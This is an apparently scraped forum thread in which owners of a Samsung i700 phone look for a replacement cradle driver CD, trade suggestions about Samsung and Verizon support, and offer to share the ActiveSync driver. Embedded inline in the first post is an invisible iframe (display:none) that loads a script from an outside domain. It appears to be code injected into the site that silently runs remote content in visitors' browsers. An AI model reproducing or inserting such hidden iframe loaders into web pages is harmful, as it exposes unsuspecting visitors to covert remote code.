My office recently caught fire and is totalled beyond repair. I managed to retrieve and clean-up my i700 cradle from the wreckage, but the CD is gone beyond repair.
Does anybody know where I can go to download the driver? I have the cradle but I don't know where to get the driver. My new office computer is coming in a few days and I want to be ready.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I would suggest contacting Samsung Tech Support, they should be able to provide you a copy. Make sure you registered your phone with them as they will want your ESN #.
I would be happy to supply the active sync driver to you via e-mail, but putting the whole CD up for download crosses the line into piracy, especially since Outlook 2000 is on it, and I'm sure Microsoft wouldn't be too happy with us.
If you want the whole CD I suggest following ppcmd's suggestion.

I called Verizon and they said they couldn't help me, and to visit my local store for the CD. The local store said to call Verizon. So I am now back at square one.
Shackrat offered to email me a copy of the driver from his CD, but I haven't heard from him in a week, so I am looking for an alternative. (Shackrat, if you are reading this, no hard feelings, I know you lead a busy life.)
Could somebody possbily send me a copy of the driver from to CD? I have my new computer, but I am unable to sync with it due to not having the driver.
AS 3.7 is alot better than 3.5 (came with the CD) and 3.6 which is now gone from the MS Site. I would help with the files but I am on dial up (sucks I know) so moving that file takes forever.
Hey Tzvi did you ever find a way to replace the CD? I just had to do a hard reset (or my phone had to) and lost everything. It was then I noticed I seemed to have misplaced my CD. I can still SYNC since there is nothing wrong with my computer and I quickly got everything reinstalled, except for Voice Signal - which I don't have a copy of. I had downloaded VST_i700_1_1_20lv.exe from Voice Signal - however this appears to be an upgrade and I need the original file. And of course if my computer ever dies I will be in Tzvi's shoes.
Samsung support is worthless and I get the run around from Verizon - any ideas?
This really cracks me up that Samsung is not willing to help customers out. If you are registered, can validate your ESN and your contact if they should be able to sell you the CD. If nothing else I would like to help out.
Thanks for the offer. I was fortunate enough to run into another i700 owner and I copied his CD.
The Samsung guys are morons. In my email to them I said that I had an i700 three times and in their response they sent me back a link to the Palm site.
Everyone make backups of your installtion CDs and put them in safe locations - getting I new one is near impossible.
